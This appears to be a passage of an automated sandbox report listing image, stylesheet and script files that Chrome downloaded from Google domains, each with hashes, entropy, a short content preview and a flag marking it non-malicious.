                                                                                                                                                                                                                                                                                          URL:"https://www.google.com/xjs/_/ss/k=xjs.s.G3hk8P0g9gc.L.B1.O/am=QAIAAAAAAAAAAAwAAAAAAAAAAAAAAAAAAAAACAAAIAAAAAAAAACQAADLJAAAYAQAAGwAQAAAAAAAEAAAMAAAAAAAAJAAAAAAgABgAQAAAAAAAEAAABARAAAAhQAAAAAQAAAwAAAAAIQAAQAIoABCACAACRAoAhAKAQAAwAEAAIAAMMAwAEEFAAMABAAAAAAAAAAAEAARAAAAKCAAgAABAHoIBICBQJgAABACAARAAAAAAIAAAAACAAIAAALAABmAAAAAAAAAACABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAIAAAAAAAAAAAAAAAAAAAAAIA/d=1/ed=1/br=1/rs=ACT90oHUtUMlhqZA634WLa37KGOmF2fTjg/m=cdos,hsm,jsa,mb4ZUb,d,csi,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl"
                                                                                                                                                                                                                                                                                          Preview:.wHYlTd{font-family:Arial,sans-serif;font-size:14px;line-height:22px}:root{--COEmY:#1f1f1f;--xhUGwc:#fff}:root{--vZe0jb:#a8c7fa;--nwXobb:#638ed4;--VuZXBd:#001d35;--uLz37c:#545d7e;--jINu6c:#001d35;--TyVYld:#0b57d0;--ZEpPmd:#c3d9fb;--QWaaaf:#638ed4;--DEeStf:#f5f8ff;--TSWZIb:#e5edff;--BRLwE:#d3e3fd;--gS5jXb:#dadce0;--Aqn7xd:#d2d2d2;--EpFNW:#fff;--IXoxUe:#5e5e5e;--bbQxAb:#474747;--YLNNHc:#1f1f1f;--TMYS9:#0b57d0;--JKqx2:#1a0dab;--rrJJUc:#0b57d0;--mXZkqc:#d2d2d2;--Nsm0ce:#0b57d0;--XKMDxc:#f3f5f6;--aYn2S:#f3f5f6;--Lm570b:#dee1e3}.yUTMj{font-family:Arial,sans-serif;font-weight:400}.VDgVie{text-align:center}.TUOsUe{text-align:left}.zJUuqf{margin-bottom:4px}.AB4Wff{margin-left:16px}.OhScic{margin:0px}.v0rrvd{padding-bottom:16px}.zsYMMe{padding:0px}.QyJI3d{background-color:var(--xhUGwc);color:#666;box-shadow:0 4px 16px rgba(0,0,0,0.2)}.oQcPt{background-color:var(--xhUGwc)}.QyJI3d{border:1px solid rgba(0,0,0,.2);position:absolute;z-index:9120}.nFdFHf{animation:g-bubble-show .2s forwards}.bE3Kif{an
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):130
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.197104639835039
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:Cn1ZrYKPqsDVvQV4mqGxRC7CseFxnlfWsryaUwyaAzhPYmTdtln:k1Z0KnDcq6CGsaxnxWsryaUwyLzKmTdX
                                                                                                                                                                                                                                                                                          MD5:9E160C331600A00D4B3642822A13B8C4
                                                                                                                                                                                                                                                                                          SHA1:87DA7E620BB58529A0A0512C9CA1D8ACA8248E77
                                                                                                                                                                                                                                                                                          SHA-256:C1AAC69D58BBD80F23D76AA468E924E32FF1E10FEC534768DA3B770BFC86A3E1
                                                                                                                                                                                                                                                                                          SHA-512:BA1FA5CDB9B0104EE6CB17AEA663AEAB402AFF40F7701E4FD17A85997CB93A72A1FC44E5570E1F2A62A056920AC27A95E48BFD7F8A1F4A12971A0F0B40E793BD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFFz...WEBPVP8Lm.../..?./..m.8f....ud.....O0..I...,f..h.?..V6...."Ij^.......E...E..F...R......_.........:.;..d>.}..#.$.\..m...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 2000x1500, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):433824
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9995865422463215
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:12288:b8DNK+ZtvctJeG0fwvfUKqiMvTc6rOj/MyzxMN:b4NKCtCJ04HUfPTcfjTM
                                                                                                                                                                                                                                                                                          MD5:B023020DA2F9B337B80F2408819DC15F
                                                                                                                                                                                                                                                                                          SHA1:13B0FB8F9F4168D4E3B0E3E331DA9F003A4D06D9
                                                                                                                                                                                                                                                                                          SHA-256:5D15A8B40EDB664F02BDB5721DEFD48E641FA40ABEDF58070A27A9C390AC6ACA
                                                                                                                                                                                                                                                                                          SHA-512:BA37BE3777982DE06E4FD0EB2BF7E3DB0254261DC213BE0D90D0C43872CE9D90BD712314A95518E86B861F71C5CCAF649A3E2D37321C804DAFC6671E5F4247FB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/4c/d2/edf619954681b4aa1e375435c62c/img.webp
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8 .....X...*....>m0.H$".#.1Z...gm..[.9..A....W.........&s......W..Wf"e#..v..6~.._...|>...~X..?@......x.*...9.......1...?../.yV.W~...o_.}D?....}......?.......~...~L..........._.G..P..?.?..S~m.Z............_..........|....?....W..../.;.|'.?........../Q.e.....o./G.W.w._._./...?......f..._.?...m..?q=..........q~=.{.....z.~....[.O....h.....k.....o.................?..oo....1~......A.....Y........a.."..M..&k....e51.......}.D.E...t.D;.....&.*t...s...C...HB........|...Q.<.K#....\,...7um...%...\.R.....v.#..WC..J..q.._..Es.d.,.'..s...@.s..$.P....iG............m)..lr#9..9...6o..q> .H...f\.J...9.o8K.g.p.X...t.|X'q.}..QN6.;?.in.G.$Z...Oi#.B`W...@..\...ia.....3......G..[..a.O{?7.Ov.......gfx.yn.;.x.!A..\,...2...&.#..vj*u.....9..{..#Xv.6....O:.o............o./u)..i......}.^.<R..,-.>>.....U.0NL.(..n.t..Q.j.1q..I.I*i..#...M...I.NzL7Z.>;..;....i.!.3.....w.x..2..q&8R..)..,....Vv.Jr....!.[..FK.....U@.y..SCr.Oj......&HK+....S....^....{...B...y5....Q...>_.#
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 700x366, components 3
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):27590
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.973501794196893
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:1MF8ms6QyV+rKzgvbWY2+EUFeWjOO9r/MJ:O8VyV+rAgBxEURi+Q
                                                                                                                                                                                                                                                                                          MD5:003E22A4E226CC7E9DF7B3FEA1D2AB6A
                                                                                                                                                                                                                                                                                          SHA1:6521BD0E61B6590D7B5D4D4D9B5088B0AF176A5B
                                                                                                                                                                                                                                                                                          SHA-256:BF626BCC4A60276E5E81BB74106C27679EBE66B6321E57B72BD0E79BD31EB38B
                                                                                                                                                                                                                                                                                          SHA-512:DF71DE4CBE1B8D7E25EBBA4316639253BDDD75E0F7064651D37BF6AA8C99561F35593AD475A4868EFAB913A968393527BBEE802BE25EB78A5A6A61127949E52A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/a2/0d/4e309f864fb198f559ed8e9f8560/ppa-width-1600-format-webp.webp=w700
                                                                                                                                                                                                                                                                                          Preview:......JFIF......................................................................................................................................................n....".........................................T......................!..1AQaq......".....2...BR...#br$t.....%3CSTds...4c...5DE...................................7........................!..Q1Aaq.."...br...#$2...34BR............?...MY...e..5...V..QN.-].qEgpV...Ji.[..E ..zF!M....RVd..4.O;.A.J.E%.A[..am....*wAY..0.(.....F.l.si.).@PS.ZS-..h....N)+p..A.wkq........E.Inm$..h...)..QkU..M......Ef;&AM+h....5..h.(#...=.3...u..V.M0...l.h".?.[.+;.f+H.E?.-.3...<aS.2..`..h..E\0.k).gr..C..<..fV7......8.oP.....*.E1.?p../.<?dPaJ...............6.W....t]2<a.M...s.d..OA.g..f.o..#..S.`..F..l...%gc9+Z....!....P.B..gG1..TL...B-...7..!@...{Q3...8. ..e..Fs.L.2.......m.30.i..jhLZ...h.().Y.6..e..}.=...).2.2.I.k..j.v.....gDQS.E.e...I3h..C[F!A..o........;...z}.n.gp....b........TvQ...aW.(..Y...y>...H"p..._N...@....7...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):399348
                                                                                                                                                                                                                                                                                          Entropy (8bit):2.620753030676894
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:VTR5FYYlnHhaQYYfYyRil85WClUKz+kvwJ+:BWyHhaKfZJ1ldz+kv
                                                                                                                                                                                                                                                                                          MD5:CE0BBE4F751415A94762B9536C470C44
                                                                                                                                                                                                                                                                                          SHA1:676CAA01FEB505A008CB7375F08B0A407D681462
                                                                                                                                                                                                                                                                                          SHA-256:A25C318D2ADB672C808AB300C85043F12697EF365A62FB20A00461F7BED8E439
                                                                                                                                                                                                                                                                                          SHA-512:BADF6062F9FC2CB662DD97843B5AA093AA569B22F32AD35F843683354EB2A3A497B4B944955F6BB7F63F7897A09BFB3A1BAF89A91390D4FC79F0B9B5F5481097
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8L..../..D..u!...R.....Qo.@....9.fc.......g.C....j......n.h{].C.C.`KP.%..:.....7..{.2O....2N.7.....w.....}..BiwQ...`.n......Fag.......!T.ipzB..H6..-".#'.u.u~..:..m).......4....J.....D.&...@.$'...{.Y.....w..Y`......s..N...N\..(6.mI........|....m.....^.....@...S..r.L.:...Q.$.L..U.kV.+..v.e5... O=.>.$OTC....J./$......E...it..:......L...$( U.DA........:..A..*.`...4.h....}K......YN[.i.....lCl..HL.A......v1.d..U(.."...<..t....M..w._-..^....nip.T1Y..fBD..m(.Y2-[2......^...:..0m...-.pRn.233s.....%%.MJ...kF.\v.:6..-....y?_U.AdP.aT.2...I...C...9....g.G...y.c5..d.t........lS....(@..(aJ..Q...D...F.`S....>.\...9. I..I2...........{...ml;Os.g.4.y.C.EW.l8A.t.......}..}...s..rv;..v..,8..QuP....@. !iS...-.u.......m.....w0l.6...?.]..m.7.......S.....`....C...!.L...y...\.S:.u..m..f.E.LV../j._7.%..3.....C...5.Y<f.c$A.B..K..;y.....{/]..-..6[.B..]#h-t..!.h..8...{a.7.(#...q..m$A..g....3]..F.$I...s..wr...B..m....~.N...G..(..tP..K..%.D.;.....%m.&..^.,.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 512 x 341, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):193609
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.997486741473688
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:3072:xyMl+ztzGdKsmFKKSpO2fmwXQ3bUdsfSsnSXFkIpX+jJonuA46tpMbBkVHh/skQq:xDlQ6dyF5UmwXaNfSsnS1CjJonXHkQhr
                                                                                                                                                                                                                                                                                          MD5:36EB24FB52166D0C85330E04220B1691
                                                                                                                                                                                                                                                                                          SHA1:C745F010F08546479803F8B68FE5F4CC7F46A2C2
                                                                                                                                                                                                                                                                                          SHA-256:3C10ADF9692F3105840F95B2528E8A674D69146192B38620422433A983EAD87C
                                                                                                                                                                                                                                                                                          SHA-512:9E09F41BD5630F28F7372AF6A6F77F1DE7236279B20D0245C7B666C60F242542AFBCB379846DE357ED4884273EDB936892F1547BD4D805C33200E8E41DFC705A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.......U........t....sBIT.....O... .IDATx.d}...#..n..k..6....t...z..9.RUf._H..8......|...H..........1.....(..1.H..p..$$...O~....0........9...b.......@R.p..?.?....H...H. ..o.@H.v..8;.`.C...O..~.$...9.Ie.D.D..k.4.........>..U......`(x_.a6......7.@....?...P...C...2_o..`,..YcA.J..D.<l...q.....F....#)| ....>.,bg...ND...~........v..2z. u..<"x....H.........P#.p..I..a...H.#...$.`...]..y'#...*.D<.G..@.! ....CV.b.B..0..."..#....}.YY.FY.#......DVk..<..`r.oA (....q.....mDE.j.0...D.1 .S9...g...]....i...H...t....?|..c,mC..FJ...k../...w;..3#.. ?G.....(7._....a.g...t.Y"A.?.;+B@C++..a.}F4TO.s.O.......<U.Y.cvq.Ud.8..?..OL.H..W.@...0 .g".'{N...<..P....~. .0..*..0....X...w..LY:.Cn.M...O..V.|..M....#.=fc.......[Y.:.A.z...t.....].F..p. X..v.....,..!F...p.y-...Q...O..vx$...m...x...`y..(.x.'{H.@..zh(..E.RX...<....D.....Q.i:.A....y....C........#. .a....4..G.;6.^...D........c".m......N.EuP...O;...)j.'.j..u%.p.W..e.).T..$z.....!!<0}..a.`..GP.../;S....|.a9...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):2571
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.841383828832313
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:pHdsnaGXZg+M4e4oJKVPfjx+uAzp5+i7+AjAJVs71z/YKg0dNGRa3nzzQpkuCE/1:TGXa+M4e4oJKVPff+pTb8s7tYKg0HGRT
                                                                                                                                                                                                                                                                                          MD5:17DD15778517BE6FA704D181739E7836
                                                                                                                                                                                                                                                                                          SHA1:CABC2D123EB963C33863E3F9CA0270E7D7074212
                                                                                                                                                                                                                                                                                          SHA-256:99E78EE6CD2E303D2E2576C5FBDA8BF117328D62196C4E977CB846D88B72B561
                                                                                                                                                                                                                                                                                          SHA-512:D6A6A7CEB236DF923D9E1A39D9ECDD312554E3600180C9F88C78762C08D53EA327BB44D3A440C0711C28D0BF28B8CA4CFF4ED0F7E2D15E14902A1B416C9D7E6F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/IW5qFdrQ464i6bDzhjV2xJvvGDsrvssd3hqgNC-Y0VDwnriCuvrzsftsfCEBzXg37G0QJAfGy9te8w8v2jebrajiiviDGB6_y1G2=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(......Y......1....H...:.C2...WIDATx....UU..?.....!.Z>P*.J..~K")c.. ..2L.a.5S..aZJ....W..AIA45..M.5...Y....1P..K......>....9..sy..>3g......_..{....`..a..a..a..a..a..a..a..a..a..Z...3......p.V.MN..>.]......b....9.9@..J......Y`#p.8Y.k,J`..!.v........,N..4.,.z................Dt.Q.u..x....0F.I..[...=.Q..Cb:2j.oL.....td.LwL...{b:2j&.s...Ux.X.<..........o...<..'p.8...B.^..g...1..j....`......a8...........8&p.1....\pL..c........\m......5..\-.2...a...X....`.........F/ F.o.f~..ZK.z).@f...w.a..c.........'."K..H..%d.w.{..K..I_.N...|.]@.z..v.;.......<.x......&...c.u....C....Q.......k.......@'.8.^...6.O..n,1...H....\..f......#..q.;.o##.JL?-.&.N'.S..........)i.......e.u).3q...ci.....j."...J.:E...:.#p....g...,N.l.N..<........V.s.k...i*b...m!$...,S..... f.5....$,.F......i\-.4`.zm...Ph.1../..'...?.f...D`<..\....V.7...w.N......N(.v2P.w.R..q.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 1280 x 720, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1174944
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.983257392787344
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24576:Ej9gfq3LXQAGeKkCcuv9YcJ4ADTlWS3zUKGsBf5UL0T:Ej9gfqbXbMdcuvXdTlF3GWBuq
                                                                                                                                                                                                                                                                                          MD5:32F918890E5324465D07A34F8AADACD0
                                                                                                                                                                                                                                                                                          SHA1:EFEBA694109E57CBAAB8D8A9A6935843FE66B2D2
                                                                                                                                                                                                                                                                                          SHA-256:84AA9515CE1D401AC817ACD81AA256721DA8FEB6D61AC0D25156CE46180EF7AB
                                                                                                                                                                                                                                                                                          SHA-512:E5D18A2E627C2358AB8F3CFF5AF565256C8E4E2A2D83E8FE644C4188B6537DC6F64DB51FA5216D151C65CE12DD494CBD8FEE9FF8B4567631343B2820E8DFC9AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/ZbVcVI5gznupH4HWFYJkqkZnHDAC09j3j3LY1PG0DYacRBX2Pko8UhGbp9Y7bhb3DUROSOs-hort72vxN96ce6LxOkzZySbUTym6faGr=w2000
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR..............}.V....sRGB.........eXIfMM.*.............................b...........j.(...........1.....%...r.2...........i.................H.......H....Adobe After Effects 2020 (Macintosh)..2022:09:08 17:00:13......................................................2022:09:08 17:00:13..T.....pHYs................riTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 6.0.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:exif="http://ns.adobe.com/exif/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/">. <exif:ColorSpace>65535</exif:ColorSpace>. <
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (766)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):5361
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.6076351893387075
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:kR4F8zgFCHOeUconfmkFSWBMpvflIx/opSECIoSVMUv/+Kv/T/n0UgarAiEnl+je:kikueU/EWBMNl4q5nH+qtDezvL1ifs
                                                                                                                                                                                                                                                                                          MD5:92F26DB8FC9AE84A86EFCE49CEA44379
                                                                                                                                                                                                                                                                                          SHA1:3CD6ED0CEE4A35A3FE4305B1ECA3368F8D56E59E
                                                                                                                                                                                                                                                                                          SHA-256:6E923048B626B3B1A8C745771D1723C649367CB650880CB9BBEB3C912F87BE39
                                                                                                                                                                                                                                                                                          SHA-512:ED3DA4D6EE8A2C2C9FF23D58B52257AA7CB49A2897234887F72F4A9E5507D1584878F489540D3C712782E3BC8D78CB4B60066531007AA494EBB017F65897D7FA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/search/howsearchworks/assets/lHimDk5Y.min.js
                                                                                                                                                                                                                                                                                          Preview:import{x as e}from"./ycaG4YXp.min.js";function i(t){switch(t){case"file":return e`. <svg. width="20". height="21". viewBox="0 0 20 21". fill="none". xmlns="http://www.w3.org/2000/svg". >. <path. d="M4.58301 17.9844C4.24967 17.9844 3.95801 17.8594 3.70801 17.6094C3.45801 17.3594 3.33301 17.0677 3.33301 16.7344V2.56769C3.33301 2.23435 3.45801 1.94269 3.70801 1.69269C3.95801 1.44269 4.24967 1.31769 4.58301 1.31769H11.583C11.7497 1.31769 11.9129 1.35241 12.0726 1.42185C12.2323 1.4913 12.3677 1.58158 12.4788 1.69269L16.2913 5.50519C16.4025 5.6163 16.4927 5.75172 16.5622 5.91144C16.6316 6.07116 16.6663 6.23435 16.6663 6.40102V16.7344C16.6663 17.0677 16.5413 17.3594 16.2913 17.6094C16.0413 17.8594 15.7497 17.9844 15.4163 17.9844H4.58301ZM11.4788 5.81769V2.56769H4.58301V16.7344H15.4163V6.44269H12.1038C11.9233 6.44269 11.774 6.38366 11.6559 6.2656C11.5379 6.14755 11.4788 5.99824 11.4788 5.81769ZM4.58301 2.56769V6.442
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 2402x1598, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):145756
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.998366208902574
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:3072:xvdGYytbiomWSliyLp3OdDcatD7RcozRRMCUzYvBt8azozh:xYYCbvmWSMjdcWRcsHNXj0V
                                                                                                                                                                                                                                                                                          MD5:5CC25E5CC3C77C617BD55EDE724CAC78
                                                                                                                                                                                                                                                                                          SHA1:F2B936EB384F30A09DCBBA427126AC72E140D2C4
                                                                                                                                                                                                                                                                                          SHA-256:983B332A37E36A8397CA4A5DA9CFCE9230EDAE6BCD0D343984FAAE223CA44329
                                                                                                                                                                                                                                                                                          SHA-512:D2DE6806692F7FAC7330CF86C71D9AC0C8D87E32649E1DBA4F8B15C26A2A3BB194870F69028815F48C1569522DDACD8AB5F16EA96DAD4926AC947CA6F441FB70
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/f0/44/5d62fedd475fa925648dfc0b6c86/7ogehopdj4kdbzv.webp
                                                                                                                                                                                                                                                                                          Preview:RIFFT9..WEBPVP8 H9.......*b.>.>m6.I$".&"1.....in..j,_...[...O..g....W...0......s....n...9.{............{7O.[.>..ia.....}5...v...W+..N...........j.......?.......>..5._.=m...].........O._s.?.......>.?..?.......Y.......2...U./....._.=W?G...G....#....b.r?........G....w./..K.6......g...?........o.?.?..y='?xD.&....:....4..p|}....#..W....G.]..bB....P......./..%...V...7^......(%2^..FB...n.j......{.....VqA2.D.h.F..,=...Y..A.KNE.G..l.'......7.p..5..M..Z.[.....o.!y..Y....t.......F0.V.^8f....1%..:..N...?ez.5;j}F|AC.c.A.xt S;g.E..>.J..B..`...E.....$6\.....\~..9..xU.[..*wu....vD+c...U.].<..p"....j..;.".|..pN.g+.g........'....p..;..r..u.....,I].Q.Z......g;,.g..QFF..yp1..n...Kn.[n.M....n.....#y..:4V.S.....}..{.]...w.;.;+.....]...t.+qP.m..u.P..m.........\.....U.M..B9..z...G......."...T.......}b=..3[j..HT..83N-8...Z.j....$..f. .{Uw6wGJ.&....J#..Q._.Un2B@..;.......v..u......U.......~!U..`dm...k...........3...-O....... .Eb....9P.W...$.{...i.1.H?..r.R.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (768)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1425
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.369730450294109
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:kWfSIi01lHbcYmfNUgG/Rt3Fhe9kuKfKXvWWVqpOUcJIUGbpxGbJ8OOHQLz9Trky:ZfSN0/4gfhQofaWHxcGUGbpxGbO8ZTrx
                                                                                                                                                                                                                                                                                          MD5:33CEBB03C13AE52E6A8B3EBEE28706BF
                                                                                                                                                                                                                                                                                          SHA1:58C87F2AD7CFF41F1A2003B7A4F36882A16E6965
                                                                                                                                                                                                                                                                                          SHA-256:2C8F42EDFAD6B9734A8E4CDFE96BFB321120BF75B15CAC9EE2EBDD37D593CA4B
                                                                                                                                                                                                                                                                                          SHA-512:9C55135B514001C7A567AD5FA9DB0E63FA8FB24DA0C665DDFDC8D7AB513AA7B30980A27E684AA334E9588084FAD91E73919F51BA73A04A7D84C38283098B1315
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:"use strict";this.default_OneGoogleWidgetUi=this.default_OneGoogleWidgetUi||{};(function(_){var window=this;.try{._.q("P6sQOc");.var xpa=!!(_.ni[0]>>26&1);var ypa=function(a,b,c,d,e){this.o=a;this.N=b;this.v=c;this.O=d;this.ha=e;this.j=0;this.l=OY(this)},zpa=function(a){var b={};_.Ea(a.Nq(),function(e){b[e]=!0});var c=a.Fq(),d=a.Hq();return new ypa(a.Gq(),c.j()*1E3,a.Aq(),d.j()*1E3,b)},OY=function(a){return Math.random()*Math.min(a.N*Math.pow(a.v,a.j),a.O)},PY=function(a,b){return a.j>=a.o?!1:b!=null?!!a.ha[b]:!0};var QY=function(a){_.S.call(this,a.oa);this.l=a.service.bs;this.o=a.service.metadata;a=a.service.hE;this.fetch=a.fetch.bind(a)};_.G(QY,_.S);QY.W=function(){return{service:{bs:_.MY,metadata:_.IY,hE:_.GW}}};QY.prototype.j=function(a,b){if(this.o.getType(a.wb())!==1)return _.hp(a);var c=this.l.Ir;(c=c?zpa(c):null)&&PY(c)?(b=RY(this,a,b,c),a=new _.gp(a,b,2)):a=_.hp(a);return a};.var RY=function(a,b,c,d){return c.then(function(e){return e},function(e){if(xpa)if(e instanceof _.Bf){
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 58 x 58, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):18405
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.30307468404555
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:oFZ/I09Da01l+gmkyTt6Hk8nT7skEWRwxNXuBQ5uPqcVAG0PuwfTl:oFS0tKg9E05T4kt+puGuwfTl
                                                                                                                                                                                                                                                                                          MD5:6E79FA388ECA6523260E1B19714CB06D
                                                                                                                                                                                                                                                                                          SHA1:67F1D1C01DC339EA0C07D2299B5BD5BC1D62F4FE
                                                                                                                                                                                                                                                                                          SHA-256:F9991B7C4894AF087C50FDEF3F3BDDB0856197877DDA93840D0967C6895BD4B5
                                                                                                                                                                                                                                                                                          SHA-512:C227F81EB418CEB66D94E14CA6B44E1210A62DFF2FE5741E48922864C526805C9DE60ED68C81E3278007D4AD95F3EA349EBA969050A5511C991AEC75AFDFF689
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/I95wjYii8vhFSSx-aSYdh2hPAMjgZkA9yjarSQoOd98COwOxkAVn_dulBcTcfbsa7Limy6IKX6G95ep6OB6y2yMLMiX0YEqFx3KQHQ=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...:...:......J(....pHYs...#...#.x.?v...OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
